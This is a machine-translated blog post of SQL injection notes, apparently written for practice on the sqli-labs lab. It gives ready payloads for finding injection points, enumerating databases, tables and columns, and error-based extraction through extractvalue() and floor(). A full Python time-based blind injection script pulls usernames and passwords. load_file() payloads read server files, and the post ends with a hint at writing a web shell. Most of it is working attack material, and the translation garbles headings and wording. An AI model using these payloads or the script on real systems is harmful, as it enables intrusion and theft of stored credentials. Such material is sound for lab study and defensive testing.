当前位置:网站首页>SQL injection
SQL injection
2022-07-26 05:20:00 【jjj34】
Catalog
Ten kinds MySQL An error injection - I wipe what the hell - Blog Garden (cnblogs.com)
Time blind note Python Script :
Experience :
stay url Injection needs to be carried out in advance url code
Such as # -> %23
One . adopt 1' # Judge whether it is character type or number type
Character :select * from user where id = '$'
Digital :select * from user where id = $
What's wrong is Digital
select * from user where id = 1' #
The character type that does not report an error
select * from user where id = '1' #
There may also be a need for 1') # To determine whether the parameter has brackets Extended to
1'))# 1')))# 1"))# 1")))#
# It could be --+
Two . View the return column
order by 1....
select 1,2,3......
3、 ... and . Look up the database name
select database()
Four . Look up the name of the table
select group_concat(table_name) from information_schema.tables where table_schema = database();database() It can be used ' The database name found ' replace
5、 ... and . Look up the list name
select group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = '$';
6、 ... and . Check data
select group_concat($1) from $2
select group_concat($11) from $2
3、 ... and . Two common functions of error reporting injection
extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
floor()
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
Ten kinds MySQL An error injection - I wipe what the hell - Blog Garden (cnblogs.com)
Time blind note Python Script :
"""
Instructions
database_length = database_length() Return the length of the database
database_name(a) Length of incoming database , Return the name of the database
table_count() Number of output tables
table_length = table_length() Returns the length of the table
table_name(length) The length of the incoming table , Output the names of all tables
column_length = column_length() Pass in the name of a single table , Query the column length under a single table
column_name(column_length,table_name) Pass in the table name , Column length , Query all column names
flag_length(table_name,column_name) Pass in the table name , Name , Return data length
flag_name(table_name,column_name,flag_length) Pass in the table name , Name , Data length , Return the value of the data
"""
'''
Grammar summary :
if($,1,2) $ by true, Output 1, Otherwise output 2
substr(string,count1,count2) from count1 The position begins , Intercept count2 Characters Such as substr(string,1,1) == s
ascii(char) take char Turn into ascii code Such as ascii(A) == 65
length(string) Return string length
database() Return the database name
'''
import requests
import time
base_url="http://127.0.0.1:80/Less-6/?id="
passtime=2
# Length of database name
def database_length():
#select * from news where id= 1 and sleep(1)
#if(?,1,2) $ by true, Output 1, Otherwise output 2
#0 Not when
for i in range(1,45):
#1+and+length%28database%28%29%29+%3D+4+and+sleep%283%29
url=base_url+"1\" and if( length(database())={} , sleep(%s) ,1) --+ ".format(i)%passtime
# 0%27/**/and/**/if( (length(select database())={} , sleep(2) ,1) %23
start_time = time.time()
response = requests.get(url)
end_time = time.time()
if(end_time - start_time > passtime): # The explanation is right
print("database_length->",i)
return i
# The database length is 4
# Check the name of the database
def database_name(length_database):
# Intercept a character , If it's right, skip to the next character
# The character range is 0-9,a-z,A-Z
#ran="abcdefghijklmnopqrstuvwxyz"
result=""
for i in range(1,length_database+1):# Control the number of characters
for j in range(33,124) :
#ascii(substr(database(),{i},1))={j}
url = base_url+"1' and if(ascii(substr(database(),{},1))={},sleep({}),1) --+ ".format(i,j,passtime)
start_time = time.time()
response = requests.get(url)
end_time = time.time()
#print(i,j)
if(end_time - start_time > passtime):
result+=chr(j)
break;
print("database_name->result:", result)
# The database name is sqli
# Running watch name , Use table name with group_concat Connect and then run
# Table length
#select group_concat(table_name) from information_schema.tables where table_schema = database()
#length(select group_concat(table_name) from information_schema.tables where table_schema = database())={}
def table_count():
i=0
while True :
#'?id=1 and if((select count(*) from information_schema.tables where table_schema=database())={},sleep(0.5),1)'.format(i)
url = base_url + "1' and if((select count(*) from information_schema.tables where table_schema=database())={},sleep(%s),1) --+"%passtime
real_url = url.format(i)
start_time=time.time()
response=requests.get(real_url)
end_time=time.time()
if(end_time-start_time>passtime):
print("table_count()->resutlt:",i)
break
else:
#print(i)
i+=1
# Two tables
# run Table name length
def table_length():
# use group_concat Test the length after connecting again
#(select group_concat(table_name) from information_schema.tables where table_schema = database())
#length()={}
#if($,sleep(3),1)
i=0
while True:
url=base_url+"1' and if( length( (select group_concat(table_name) from information_schema.tables where table_schema = database()) )={},sleep(%s),1) --+"%passtime
real_url = url.format(i)
start_time = time.time()
response = requests.get(real_url)
end_time = time.time()
if (end_time - start_time > passtime):
print("table_length()->resutlt:", i)
break
else:
i += 1
return i;
def table_name(table_length):
result=""
for i in range(1,table_length+1):# The first n Characters
for j in range(33,127):#ascii
#if($,sleep(3),1)
#ascii()={}
#substr($,{},1)
#(select group_concat(table_name) from information_schema.tables where table_schema=database())
url=base_url+"1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))={},sleep(%s),1) --+"%passtime
real_url=url.format(i,j)
start_time = time.time()
response = requests.get(real_url)
end_time = time.time()
if (end_time - start_time > passtime):
result+=chr(j)
print("table_name->result:",result);
break
# Fields are the same as table names , Run the length first and then the specific characters
def column_length(table_name):
i=0
while True:
#if($,sleep(5),3)
#length()={}
#(select concat(column_name) from information_schema.columns where table_name='flag' and table_schema=database())
url=base_url+"1' and if( length( (select group_concat(column_name) from information_schema.columns where table_name='{}' and table_schema=database()) )={},sleep({}),3) --+ "
real_url = url.format(table_name,i,passtime)
start_time = time.time()
response = requests.get(real_url)
end_time = time.time()
#print(i)
if (end_time - start_time > passtime):
print("column_length->resutlt:", i)
break
else:
#print(i)
i += 1
def column_name(column_length,table_name):
result=""
for i in range(1,column_length+1):
for j in range(33,127):
#if((),sleep(3),1)
#ascii()
#substr((),{},1)
#(select column_name from information_schema.columns where table_name='flag' and table_schema=database())
url=base_url+"1' and if( ascii( substr( (select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()) , {} ,1 ) )={} , sleep({}) , 1) --+"
real_url=url.format(i,j,passtime)
start_time=time.time()
response=requests.get(real_url)
end_time=time.time()
if(end_time-start_time>passtime):
result+=chr(j)
print("column_name->result", result)
print("column_name->result",result)
# Check data : length , Specific letters
def flag_length(table_name,column_name):
i=0
while True:
url=base_url+"1' and if( ( length( (select group_concat({}) from {}) ) )={},sleep({}),1) --+"
real_url=url.format(column_name,table_name,i,passtime)
start_time=time.time()
response=requests.get(real_url)
end_time=time.time()
if(end_time-start_time>passtime):
print(i)
break
else:
i+=1
def flag_name(table_name,column_name,flag_length):
result=""
for i in range(1,flag_length+1):
for j in range(33,127):
#if((()={}),sleep(3),1)
#ascii()
#substr((),{},1)
#(select flag from flag)
url=base_url+"1' and if( ( ( ascii( substr( ( (select group_concat({}) from {}) ),{},1) ) )={}),sleep({}),1) --+"
real_url=url.format(column_name,table_name,i,j,passtime)
start_time = time.time()
response = requests.get(real_url)
end_time = time.time()
if (end_time - start_time > passtime):
result+=chr(j)
print("flag_name->%s"%column_name,result)
break
if __name__ == "__main__":
database_length = database_length()
#database_name(8)
#table_count() # It's not necessary
#table_length = table_length()
#table_name(table_length)
#column_length = column_length("users")
#column_name(20,"users")
#flag_length("users","username")
#flag_name("users", "password", 91)
Read and write file operation
Premise : This user has high privileges
What information to read ? User information , account number , password
select load_file(' route ')
Such as
select load_file('d:/d.txt')
select load_file('/var/www/html/flag.php')What to write ? Write a sentence
边栏推荐
- Recommended reading: how can testers get familiar with new businesses quickly?
- nacos注册中心
- jupyter notebook快捷键
- C语言详解系列——函数的认识(3)形参,实参,嵌套调用和链式访问
- kubernetes install completed
- 【个人总结】2022.7.24周结
- Embedded sharing collection 21
- Getaverse, a distant bridge to Web3
- Compilation method of flood control evaluation report and flood modeling under the new guidelines
- Bash shortcut key to improve command line efficiency [Full Version]
猜你喜欢
C语言力扣第41题之缺失的第一个正数。两种方法,预处理快排与原地哈希
Lesson 2 getting to know slam for the first time
DOM event flow event bubble event capture event delegate
Improve reduce parallelism in shuffle operation
开发转测试:从零开始的6年自动化之路
Compilation method of flood control evaluation report and flood modeling under the new guidelines
![提升命令行效率的 Bash 快捷键 [完整版]](/img/ec/f0dd2fbfac6853ae60d7cf52d8f3e1.png)
提升命令行效率的 Bash 快捷键 [完整版]
TZC 1283: simple sort - Comparative sort
Leetcode linked list problem - 206. reverse linked list (learn linked list by one question and one article)
IVR在voip电话系统的应用与价值
随机推荐
测试必备工具之Fiddler,你真的了解吗?
MySQL basic learning
Development to testing: a six-year road to automation from scratch
C语言详解系列——函数的认识(4)函数的声明与定义,简单练习题
Nacos registry
OD-Paper【2】:Fast R-CNN
Trend of the times - the rise of cloud native databases
ALV program collection
Basic methods of realizing licensing function in C language
Practical technology of SWAT Model in simulation of hydrology, water resources and non-point source pollution
The first positive number missing in question 41 of C language. Two methods, preprocessing, fast sorting and in situ hashing
Excel VBA: summarize calculation output results by date (SUMIF)
If MySQL calculates the current month change / current month increase / year-on-year change / year-on-year increase?
Shell的read 读取控制台输入、read的使用
Webassembly 01 basic information
no networks found in /etc/cni/net.d
手把手教你用代码实现SSO单点登录
Computable general equilibrium (CGE) model practice technology in resource environment under the goal of "double carbon"
C language force buckle question 42 of rain. Four methods - violence, dynamic planning, stack, double pointer
Code audit CMS